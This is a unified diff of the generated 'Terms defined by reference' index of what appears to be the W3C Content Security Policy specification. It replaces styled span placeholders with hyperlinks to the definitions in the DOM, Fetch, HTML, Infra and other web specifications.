-   <a href="https://drafts.css-houdini.org/worklets/#workletglobalscope-owner-document">https://drafts.css-houdini.org/worklets/#workletglobalscope-owner-document</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-workletglobalscope-owner-document">4.2.2. 
-    Initialize a global object’s CSP list </a>
-   </ul>
-  </aside>
   <h3 class="no-num no-ref heading settled" id="index-defined-elsewhere"><span class="content">Terms defined by reference</span><a class="self-link" href="#index-defined-elsewhere"></a></h3>
   <ul class="index">
    <li>
+    <a data-link-type="biblio">[CSP3]</a> defines the following terms:
+    <ul>
+     <li><a href="https://w3c.github.io/webappsec-csp/#violation-report">violation report</a>
+    </ul>
+   <li>
     <a data-link-type="biblio">[css-cascade-4]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-at-ruledef-import" style="color:initial">@import</span>
+     <li><a href="https://drafts.csswg.org/css-cascade-4/#at-ruledef-import">@import</a>
     </ul>
    <li>
     <a data-link-type="biblio">[CSSOM]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-insert-a-css-rule" style="color:initial">insert a css rule</span>
-     <li><span class="dfn-paneled" id="term-for-parse-a-css-declaration-block" style="color:initial">parse a css declaration block</span>
-     <li><span class="dfn-paneled" id="term-for-parse-a-css-rule" style="color:initial">parse a css rule</span>
-     <li><span class="dfn-paneled" id="term-for-parse-a-group-of-selectors" style="color:initial">parse a group of selectors</span>
+     <li><a href="https://drafts.csswg.org/cssom-1/#insert-a-css-rule">insert a css rule</a>
+     <li><a href="https://drafts.csswg.org/cssom-1/#parse-a-css-declaration-block">parse a css declaration block</a>
+     <li><a href="https://drafts.csswg.org/cssom-1/#parse-a-css-rule">parse a css rule</a>
+     <li><a href="https://drafts.csswg.org/cssom-1/#parse-a-group-of-selectors">parse a group of selectors</a>
     </ul>
    <li>
     <a data-link-type="biblio">[DOM]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-document" style="color:initial">Document</span>
-     <li><span class="dfn-paneled" id="term-for-element" style="color:initial">Element</span>
-     <li><span class="dfn-paneled" id="term-for-event" style="color:initial">Event</span>
-     <li><span class="dfn-paneled" id="term-for-dictdef-eventinit" style="color:initial">EventInit</span>
-     <li><span class="dfn-paneled" id="term-for-dom-event-bubbles" style="color:initial">bubbles</span>
-     <li><span class="dfn-paneled" id="term-for-dom-event-composed" style="color:initial">composed</span>
-     <li><span class="dfn-paneled" id="term-for-connected" style="color:initial">connected</span>
-     <li><span class="dfn-paneled" id="term-for-concept-document" style="color:initial">document</span>
-     <li><span class="dfn-paneled" id="term-for-concept-event-fire" style="color:initial">fire an event</span>
-     <li><span class="dfn-paneled" id="term-for-concept-node-document" style="color:initial">node document</span>
-     <li><span class="dfn-paneled" id="term-for-dom-document-origin" style="color:initial">origin</span>
-     <li><span class="dfn-paneled" id="term-for-concept-shadow-including-root" style="color:initial">shadow-including root</span>
-     <li><span class="dfn-paneled" id="term-for-dom-event-target" style="color:initial">target</span>
+     <li><a href="https://dom.spec.whatwg.org/#document">Document</a>
+     <li><a href="https://dom.spec.whatwg.org/#element">Element</a>
+     <li><a href="https://dom.spec.whatwg.org/#event">Event</a>
+     <li><a href="https://dom.spec.whatwg.org/#dictdef-eventinit">EventInit</a>
+     <li><a href="https://dom.spec.whatwg.org/#dom-event-bubbles">bubbles</a>
+     <li><a href="https://dom.spec.whatwg.org/#dom-event-composed">composed</a>
+     <li><a href="https://dom.spec.whatwg.org/#connected">connected</a>
+     <li><a href="https://dom.spec.whatwg.org/#concept-document">document</a>
+     <li><a href="https://dom.spec.whatwg.org/#concept-event-fire">fire an event</a>
+     <li><a href="https://dom.spec.whatwg.org/#concept-node-document">node document</a>
+     <li><a href="https://dom.spec.whatwg.org/#dom-document-origin">origin</a>
+     <li><a href="https://dom.spec.whatwg.org/#concept-shadow-including-root">shadow-including root</a>
+     <li><a href="https://dom.spec.whatwg.org/#dom-event-target">target</a>
     </ul>
    <li>
     <a data-link-type="biblio">[ECMA262]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-sec-function-objects" style="color:initial">Function()</span>
-     <li><span class="dfn-paneled" id="term-for-sec-hostensurecancompilestrings" style="color:initial">HostEnsureCanCompileStrings()</span>
-     <li><span class="dfn-paneled" id="term-for-sec-json.stringify" style="color:initial">JSON.stringify()</span>
-     <li><span class="dfn-paneled" id="term-for-sec-eval-x" style="color:initial">eval()</span>
-     <li><span class="dfn-paneled" id="term-for-realm" style="color:initial">realm</span>
+     <li><a href="https://tc39.github.io/ecma262#sec-function-objects">Function()</a>
+     <li><a href="https://tc39.github.io/ecma262#sec-hostensurecancompilestrings">HostEnsureCanCompileStrings()</a>
+     <li><a href="https://tc39.github.io/ecma262#sec-json.stringify">JSON.stringify()</a>
+     <li><a href="https://tc39.github.io/ecma262#sec-eval-x">eval()</a>
+     <li><a href="https://tc39.github.io/ecma262#realm">realm</a>
     </ul>
    <li>
     <a data-link-type="biblio">[ENCODING]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-utf-8-encode" style="color:initial">utf-8 encode</span>
+     <li><a href="https://encoding.spec.whatwg.org/#utf-8-encode">utf-8 encode</a>
     </ul>
    <li>
     <a data-link-type="biblio">[FETCH]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-concept-request-body" style="color:initial">body</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-client" style="color:initial">client</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-credentials-mode" style="color:initial">credentials mode</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-nonce-metadata" style="color:initial">cryptographic nonce metadata</span>
-     <li><span class="dfn-paneled" id="term-for-concept-response-csp-list" style="color:initial">csp list</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-current-url" style="color:initial">current url</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-destination" style="color:initial">destination</span>
-     <li><span class="dfn-paneled" id="term-for-concept-header-extract-mime-type" style="color:initial">extract a mime type</span>
-     <li><span class="dfn-paneled" id="term-for-extract-header-list-values" style="color:initial">extracting header list values</span>
-     <li><span class="dfn-paneled" id="term-for-concept-fetch" style="color:initial">fetch</span>
-     <li><span class="dfn-paneled" id="term-for-concept-response-header-list" style="color:initial">header list <small>(for response)</small></span>
-     <li><span class="dfn-paneled" id="term-for-concept-http-fetch" style="color:initial">http fetch</span>
-     <li><span class="dfn-paneled" id="term-for-concept-http-network-fetch" style="color:initial">http-network fetch</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-initiator" style="color:initial">initiator</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-integrity-metadata" style="color:initial">integrity metadata</span>
-     <li><span class="dfn-paneled" id="term-for-request-keepalive-flag" style="color:initial">keepalive flag</span>
-     <li><span class="dfn-paneled" id="term-for-local-scheme" style="color:initial">local scheme</span>
-     <li><span class="dfn-paneled" id="term-for-concept-main-fetch" style="color:initial">main fetch</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-method" style="color:initial">method</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-mode" style="color:initial">mode</span>
-     <li><span class="dfn-paneled" id="term-for-concept-network-error" style="color:initial">network error</span>
-     <li><span class="dfn-paneled" id="term-for-network-scheme" style="color:initial">network scheme</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-origin" style="color:initial">origin</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-parser-metadata" style="color:initial">parser metadata</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-redirect-count" style="color:initial">redirect count</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-redirect-mode" style="color:initial">redirect mode</span>
-     <li><span class="dfn-paneled" id="term-for-redirect-status" style="color:initial">redirect status</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request" style="color:initial">request</span>
-     <li><span class="dfn-paneled" id="term-for-concept-response" style="color:initial">response</span>
-     <li><span class="dfn-paneled" id="term-for-request-destination-script-like" style="color:initial">script-like</span>
-     <li><span class="dfn-paneled" id="term-for-concept-response-status" style="color:initial">status</span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-target-browsing-context" style="color:initial">target browsing context</span>
-     <li><span class="dfn-paneled" id="term-for-concept-response-url" style="color:initial">url <small>(for response)</small></span>
-     <li><span class="dfn-paneled" id="term-for-concept-request-window" style="color:initial">window</span>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-body">body</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-client">client</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-credentials-mode">credentials mode</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata">cryptographic nonce metadata</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-response-csp-list">csp list</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-current-url">current url</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-destination">destination</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-header-extract-mime-type">extract a mime type</a>
+     <li><a href="https://fetch.spec.whatwg.org/#extract-header-list-values">extracting header list values</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-fetch">fetch</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-header-list">header list <small>(for request)</small></a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-response-header-list">header list <small>(for response)</small></a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-http-fetch">http fetch</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-http-network-fetch">http-network fetch</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-initiator">initiator</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-integrity-metadata">integrity metadata</a>
+     <li><a href="https://fetch.spec.whatwg.org/#request-keepalive-flag">keepalive flag</a>
+     <li><a href="https://fetch.spec.whatwg.org/#local-scheme">local scheme</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-main-fetch">main fetch</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-method">method</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-mode">mode</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-network-error">network error</a>
+     <li><a href="https://fetch.spec.whatwg.org/#network-scheme">network scheme</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-origin">origin</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-parser-metadata">parser metadata</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-redirect-count">redirect count</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-redirect-mode">redirect mode</a>
+     <li><a href="https://fetch.spec.whatwg.org/#redirect-status">redirect status</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request">request</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-response">response</a>
+     <li><a href="https://fetch.spec.whatwg.org/#request-destination-script-like">script-like</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-response-status">status</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-target-browsing-context">target browsing context</a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-url">url <small>(for request)</small></a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-response-url">url <small>(for response)</small></a>
+     <li><a href="https://fetch.spec.whatwg.org/#concept-request-window">window</a>
     </ul>
    <li>
     <a data-link-type="biblio">[HTML]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-parser-inserted" style="color:initial">"parser-inserted"</span>
-     <li><span class="dfn-paneled" id="term-for-dedicatedworkerglobalscope" style="color:initial">DedicatedWorkerGlobalScope</span>
-     <li><span class="dfn-paneled" id="term-for-sharedworker" style="color:initial">SharedWorker</span>
-     <li><span class="dfn-paneled" id="term-for-sharedworkerglobalscope" style="color:initial">SharedWorkerGlobalScope</span>
-     <li><span class="dfn-paneled" id="term-for-window" style="color:initial">Window</span>
-     <li><span class="dfn-paneled" id="term-for-worker" style="color:initial">Worker</span>
-     <li><span class="dfn-paneled" id="term-for-workerglobalscope" style="color:initial">WorkerGlobalScope</span>
-     <li><span class="dfn-paneled" id="term-for-the-a-element" style="color:initial">a</span>
-     <li><span class="dfn-paneled" id="term-for-an-iframe-srcdoc-document" style="color:initial">an iframe srcdoc document</span>
-     <li><span class="dfn-paneled" id="term-for-applet" style="color:initial">applet</span>
-     <li><span class="dfn-paneled" id="term-for-ascii-serialisation-of-an-origin" style="color:initial">ascii serialization of an origin</span>
-     <li><span class="dfn-paneled" id="term-for-concept-document-window" style="color:initial">associated document</span>
-     <li><span class="dfn-paneled" id="term-for-the-base-element" style="color:initial">base</span>
-     <li><span class="dfn-paneled" id="term-for-browsing-context" style="color:initial">browsing context</span>
-     <li><span class="dfn-paneled" id="term-for-case-sensitive" style="color:initial">case-sensitive</span>
-     <li><span class="dfn-paneled" id="term-for-attr-meta-content" style="color:initial">content</span>
-     <li><span class="dfn-paneled" id="term-for-attr-meta-http-equiv-content-security-policy" style="color:initial">content security policy state</span>
-     <li><span class="dfn-paneled" id="term-for-concept-document-csp-list" style="color:initial">csp list</span>
-     <li><span class="dfn-paneled" id="term-for-current-settings-object" style="color:initial">current settings object</span>
-     <li><span class="dfn-paneled" id="term-for-attr-object-data" style="color:initial">data</span>
-     <li><span class="dfn-paneled" id="term-for-dom-document-2" style="color:initial">document</span>
-     <li><span class="dfn-paneled" id="term-for-parse-error-duplicate-attribute" style="color:initial">duplicate-attribute</span>
-     <li><span class="dfn-paneled" id="term-for-the-embed-element" style="color:initial">embed</span>
-     <li><span class="dfn-paneled" id="term-for-environment-settings-object" style="color:initial">environment settings object</span>
-     <li><span class="dfn-paneled" id="term-for-forced-sandboxing-flag-set" style="color:initial">forced sandboxing flag set</span>
-     <li><span class="dfn-paneled" id="term-for-the-form-element" style="color:initial">form</span>
-     <li><span class="dfn-paneled" id="term-for-frame" style="color:initial">frame</span>
-     <li><span class="dfn-paneled" id="term-for-concept-settings-object-global" style="color:initial">global object <small>(for environment settings object)</small></span>
-     <li><span class="dfn-paneled" id="term-for-attr-base-href" style="color:initial">href</span>
-     <li><span class="dfn-paneled" id="term-for-attr-meta-http-equiv" style="color:initial">http-equiv</span>
-     <li><span class="dfn-paneled" id="term-for-the-iframe-element" style="color:initial">iframe</span>
-     <li><span class="dfn-paneled" id="term-for-initialise-the-document-object" style="color:initial">initializing a new document object</span>
-     <li><span class="dfn-paneled" id="term-for-the-link-element" style="color:initial">link</span>
-     <li><span class="dfn-paneled" id="term-for-meta" style="color:initial">meta</span>
-     <li><span class="dfn-paneled" id="term-for-nested-browsing-context" style="color:initial">nested browsing context</span>
-     <li><span class="dfn-paneled" id="term-for-browsing-context-nested-through" style="color:initial">nested through</span>
-     <li><span class="dfn-paneled" id="term-for-attr-nonce" style="color:initial">nonce</span>
-     <li><span class="dfn-paneled" id="term-for-the-object-element" style="color:initial">object</span>
-     <li><span class="dfn-paneled" id="term-for-concept-origin-opaque" style="color:initial">opaque origin</span>
-     <li><span class="dfn-paneled" id="term-for-concept-settings-object-origin" style="color:initial">origin <small>(for environment settings object)</small></span>
-     <li><span class="dfn-paneled" id="term-for-concept-WorkerGlobalScope-owner-set" style="color:initial">owner set</span>
-     <li><span class="dfn-paneled" id="term-for-parse-a-sandboxing-directive" style="color:initial">parse a sandboxing directive</span>
-     <li><span class="dfn-paneled" id="term-for-concept-script-parse-error" style="color:initial">parse error</span>
-     <li><span class="dfn-paneled" id="term-for-dom-a-ping" style="color:initial">ping</span>
-     <li><span class="dfn-paneled" id="term-for-plugin-document" style="color:initial">plugin document</span>
-     <li><span class="dfn-paneled" id="term-for-prepare-a-script" style="color:initial">prepare a script</span>
-     <li><span class="dfn-paneled" id="term-for-process-a-navigate-fetch" style="color:initial">process a navigate fetch</span>
-     <li><span class="dfn-paneled" id="term-for-process-a-navigate-response" style="color:initial">process a navigate response</span>
-     <li><span class="dfn-paneled" id="term-for-process-the-iframe-attributes" style="color:initial">process the iframe attributes</span>
-     <li><span class="dfn-paneled" id="term-for-queue-a-task" style="color:initial">queue a task</span>
-     <li><span class="dfn-paneled" id="term-for-dom-document-referrer" style="color:initial">referrer</span>
-     <li><span class="dfn-paneled" id="term-for-relevant-settings-object" style="color:initial">relevant settings object</span>
-     <li><span class="dfn-paneled" id="term-for-run-a-worker" style="color:initial">run a worker</span>
-     <li><span class="dfn-paneled" id="term-for-attr-iframe-sandbox" style="color:initial">sandbox</span>
-     <li><span class="dfn-paneled" id="term-for-sandboxed-origin-browsing-context-flag" style="color:initial">sandboxed origin browsing context flag</span>
-     <li><span class="dfn-paneled" id="term-for-sandboxed-scripts-browsing-context-flag" style="color:initial">sandboxed scripts browsing context flag</span>
-     <li><span class="dfn-paneled" id="term-for-concept-origin-scheme" style="color:initial">scheme</span>
-     <li><span class="dfn-paneled" id="term-for-script" style="color:initial">script</span>
-     <li><span class="dfn-paneled" id="term-for-set-the-frozen-base-url" style="color:initial">set the frozen base url</span>
-     <li><span class="dfn-paneled" id="term-for-dom-setinterval" style="color:initial">setInterval()</span>
-     <li><span class="dfn-paneled" id="term-for-dom-settimeout" style="color:initial">setTimeout()</span>
-     <li><span class="dfn-paneled" id="term-for-source-browsing-context" style="color:initial">source browsing context</span>
-     <li><span class="dfn-paneled" id="term-for-the-style-element" style="color:initial">style</span>
-     <li><span class="dfn-paneled" id="term-for-top-level-browsing-context" style="color:initial">top-level browsing context</span>
-     <li><span class="dfn-paneled" id="term-for-attr-embed-type" style="color:initial">type</span>
-     <li><span class="dfn-paneled" id="term-for-update-a-style-block" style="color:initial">update a style block</span>
+     <li><a href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted">"parser-inserted"</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/workers.html#dedicatedworkerglobalscope">DedicatedWorkerGlobalScope</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/workers.html#sharedworker">SharedWorker</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/workers.html#sharedworkerglobalscope">SharedWorkerGlobalScope</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/window-object.html#window">Window</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/workers.html#worker">Worker</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/workers.html#workerglobalscope">WorkerGlobalScope</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/text-level-semantics.html#the-a-element">a</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#an-iframe-srcdoc-document">an iframe srcdoc document</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/obsolete.html#applet">applet</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#ascii-serialisation-of-an-origin">ascii serialization of an origin</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/window-object.html#concept-document-window">associated document</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element">base</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context">browsing context</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive">case-sensitive</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-content">content</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv-content-security-policy">content security policy state</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list">csp list</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#current-settings-object">current settings object</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-object-data">data</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/window-object.html#dom-document-2">document</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/parsing.html#parse-error-duplicate-attribute">duplicate-attribute</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element">embed</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object">environment settings object</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#forced-sandboxing-flag-set">forced sandboxing flag set</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/forms.html#the-form-element">form</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/obsolete.html#frame">frame</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object">global object</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-realm-global">global object <small>(for Realm)</small></a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global">global object <small>(for environment settings object)</small></a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-base-href">href</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv">http-equiv</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element">iframe</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#initialise-the-document-object">initializing a new document object</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#the-link-element">link</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#meta">meta</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context">nested browsing context</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context-nested-through">nested through</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element">object</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin-opaque">opaque origin</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin">origin</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-origin">origin <small>(for environment settings object)</small></a>
+     <li><a href="https://html.spec.whatwg.org/#concept-WorkerGlobalScope-owner-set">owner set</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#parse-a-sandboxing-directive">parse a sandboxing directive</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-script-parse-error">parse error</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/text-level-semantics.html#dom-a-ping">ping</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#plugin-document">plugin document</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/scripting.html#prepare-a-script">prepare a script</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-fetch">process a navigate fetch</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-response">process a navigate response</a>
+     <li><a href="https://html.spec.whatwg.org/#process-the-iframe-attributes">process the iframe attributes</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#queue-a-task">queue a task</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/dom.html#dom-document-referrer">referrer</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object">relevant settings object</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/workers.html#run-a-worker">run a worker</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-iframe-sandbox">sandbox</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#sandboxed-origin-browsing-context-flag">sandboxed origin browsing context flag</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#sandboxed-scripts-browsing-context-flag">sandboxed scripts browsing context flag</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/origin.html#concept-origin-scheme">scheme</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/scripting.html#script">script</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#set-the-frozen-base-url">set the frozen base url</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval">setInterval()</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-settimeout">setTimeout()</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#source-browsing-context">source browsing context</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#the-style-element">style</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/browsers.html#top-level-browsing-context">top-level browsing context</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-embed-type">type</a>
+     <li><a href="https://html.spec.whatwg.org/multipage/semantics.html#update-a-style-block">update a style block</a>
     </ul>
    <li>
     <a data-link-type="biblio">[INFRA]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-set-append" style="color:initial">append <small>(for set)</small></span>
-     <li><span class="dfn-paneled" id="term-for-ascii-case-insensitive" style="color:initial">ascii case-insensitive</span>
-     <li><span class="dfn-paneled" id="term-for-ascii-lowercase" style="color:initial">ascii lowercase</span>
-     <li><span class="dfn-paneled" id="term-for-ascii-string" style="color:initial">ascii string</span>
-     <li><span class="dfn-paneled" id="term-for-ascii-whitespace" style="color:initial">ascii whitespace</span>
-     <li><span class="dfn-paneled" id="term-for-collect-a-sequence-of-code-points" style="color:initial">collecting a sequence of code points</span>
-     <li><span class="dfn-paneled" id="term-for-list-contain" style="color:initial">contain</span>
-     <li><span class="dfn-paneled" id="term-for-iteration-continue" style="color:initial">continue</span>
-     <li><span class="dfn-paneled" id="term-for-javascript-string-convert" style="color:initial">convert</span>
-     <li><span class="dfn-paneled" id="term-for-" style="color:initial">infra</span>
-     <li><span class="dfn-paneled" id="term-for-list-is-empty" style="color:initial">is empty</span>
-     <li><span class="dfn-paneled" id="term-for-list" style="color:initial">list</span>
-     <li><span class="dfn-paneled" id="term-for-ordered-set" style="color:initial">ordered set</span>
-     <li><span class="dfn-paneled" id="term-for-ordered-set①" style="color:initial">set</span>
-     <li><span class="dfn-paneled" id="term-for-split-on-ascii-whitespace" style="color:initial">split a string on ascii whitespace</span>
-     <li><span class="dfn-paneled" id="term-for-split-on-commas" style="color:initial">split a string on commas</span>
-     <li><span class="dfn-paneled" id="term-for-strictly-split" style="color:initial">strictly split a string</span>
-     <li><span class="dfn-paneled" id="term-for-string" style="color:initial">string</span>
-     <li><span class="dfn-paneled" id="term-for-strip-leading-and-trailing-ascii-whitespace" style="color:initial">strip leading and trailing ascii whitespace</span>
+     <li><a href="https://infra.spec.whatwg.org/#list-append">append <small>(for list)</small></a>
+     <li><a href="https://infra.spec.whatwg.org/#set-append">append <small>(for set)</small></a>
+     <li><a href="https://infra.spec.whatwg.org/#ascii-case-insensitive">ascii case-insensitive</a>
+     <li><a href="https://infra.spec.whatwg.org/#ascii-lowercase">ascii lowercase</a>
+     <li><a href="https://infra.spec.whatwg.org/#ascii-string">ascii string</a>
+     <li><a href="https://infra.spec.whatwg.org/#ascii-whitespace">ascii whitespace</a>
+     <li><a href="https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points">collecting a sequence of code points</a>
+     <li><a href="https://infra.spec.whatwg.org/#list-contain">contain</a>
+     <li><a href="https://infra.spec.whatwg.org/#iteration-continue">continue</a>
+     <li><a href="https://infra.spec.whatwg.org/#javascript-string-convert">convert</a>
+     <li><a href="https://infra.spec.whatwg.org/#">infra</a>
+     <li><a href="https://infra.spec.whatwg.org/#list-is-empty">is empty</a>
+     <li><a href="https://infra.spec.whatwg.org/#list">list</a>
+     <li><a href="https://infra.spec.whatwg.org/#ordered-set">ordered set</a>
+     <li><a href="https://infra.spec.whatwg.org/#ordered-set">set</a>
+     <li><a href="https://infra.spec.whatwg.org/#split-on-ascii-whitespace">split a string on ascii whitespace</a>
+     <li><a href="https://infra.spec.whatwg.org/#split-on-commas">split a string on commas</a>
+     <li><a href="https://infra.spec.whatwg.org/#strictly-split">strictly split a string</a>
+     <li><a href="https://infra.spec.whatwg.org/#string">string</a>
+     <li><a href="https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace">strip leading and trailing ascii whitespace</a>
     </ul>
    <li>
     <a data-link-type="biblio">[MIMESNIFF]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-valid-mime-type" style="color:initial">valid mime type</span>
+     <li><a href="https://mimesniff.spec.whatwg.org/#valid-mime-type">valid mime type</a>
     </ul>
    <li>
     <a data-link-type="biblio">[REPORTING]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-group" style="color:initial">group</span>
-     <li><span class="dfn-paneled" id="term-for-queue-report" style="color:initial">queue report</span>
+     <li><a href="https://w3c.github.io/reporting/#group">group</a>
+     <li><a href="https://w3c.github.io/reporting/#queue-report">queue report</a>
+     <li><a href="https://w3c.github.io/reporting/#report-type">report type</a>
+     <li><a href="https://w3c.github.io/reporting/#visible-to-reportingobservers">visible to reportingobservers</a>
+    </ul>
+   <li>
+    <a data-link-type="biblio">[reporting-1]</a> defines the following terms:
+    <ul>
+     <li><a href="https://w3c.github.io/reporting/#reportbody">ReportBody</a>
     </ul>
    <li>
     <a data-link-type="biblio">[rfc2045]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-section-5.1" style="color:initial">subtype</span>
-     <li><span class="dfn-paneled" id="term-for-section-5.1①" style="color:initial">type</span>
+     <li><a href="https://tools.ietf.org/html/rfc2045#section-5.1">subtype</a>
+     <li><a href="https://tools.ietf.org/html/rfc2045#section-5.1">type</a>
     </ul>
    <li>
     <a data-link-type="biblio">[RFC3986]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-section-3.2.2" style="color:initial">ipv4address</span>
-     <li><span class="dfn-paneled" id="term-for-section-3.3" style="color:initial">path-absolute</span>
